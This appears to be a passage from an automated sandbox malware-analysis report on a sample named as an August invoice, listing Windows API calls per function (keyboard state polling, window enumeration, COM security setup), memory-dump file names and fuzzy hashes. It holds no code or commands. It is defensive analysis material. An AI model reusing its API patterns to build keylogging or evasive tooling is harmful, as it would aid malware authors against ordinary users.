                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 2295938435-8599901
                                                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                          APIs
                                                          • timeGetTime.WINMM ref: 00443B67
                                                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                          • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                          • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                          • IsWindow.USER32(00000000), ref: 00443C3A
                                                          • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1834419854-3405671355
                                                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                          • LoadStringW.USER32(00000000), ref: 00454040
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • _wprintf.LIBCMT ref: 00454074
                                                          • __swprintf.LIBCMT ref: 004540A3
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 455036304-4153970271
                                                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                          APIs
                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                          • _memmove.LIBCMT ref: 00467EB8
                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                          • _memmove.LIBCMT ref: 00467F6C
                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                          • String ID:
                                                          • API String ID: 2170234536-0
                                                          • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                          • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00453CE0
                                                          • SetKeyboardState.USER32(?), ref: 00453D3B
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                          • GetKeyState.USER32(000000A0), ref: 00453D75
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                          • GetKeyState.USER32(00000011), ref: 00453DEF
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                          • GetKeyState.USER32(00000012), ref: 00453E26
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                          • DeleteObject.GDI32(?), ref: 0047151E
                                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                          • DeleteObject.GDI32(?), ref: 004715EA
                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                          • String ID:
                                                          • API String ID: 3218148540-0
                                                          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                          • String ID:
                                                          • API String ID: 136442275-0
                                                          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                          APIs
                                                          • _wcsncpy.LIBCMT ref: 00467490
                                                          • _wcsncpy.LIBCMT ref: 004674BC
                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                          • _wcstok.LIBCMT ref: 004674FF
                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                          • _wcstok.LIBCMT ref: 004675B2
                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                          • _wcslen.LIBCMT ref: 00467793
                                                          • _wcscpy.LIBCMT ref: 00467641
                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          • _wcslen.LIBCMT ref: 004677BD
                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                          • String ID: X
                                                          • API String ID: 3104067586-3081909835
                                                          • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                          • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                          • _wcslen.LIBCMT ref: 0046CDB0
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                          • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 0046CEA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 440038798-2785691316
                                                          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                          • _wcslen.LIBCMT ref: 004610A3
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                          • GetWindowRect.USER32(?,?), ref: 00461248
                                                            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                          • String ID: ThumbnailClass
                                                          • API String ID: 4136854206-1241985126
                                                          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                          APIs
                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                          • GetClientRect.USER32(?,?), ref: 00471A1A
                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                          • String ID: 2
                                                          • API String ID: 1331449709-450215437
                                                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                          APIs
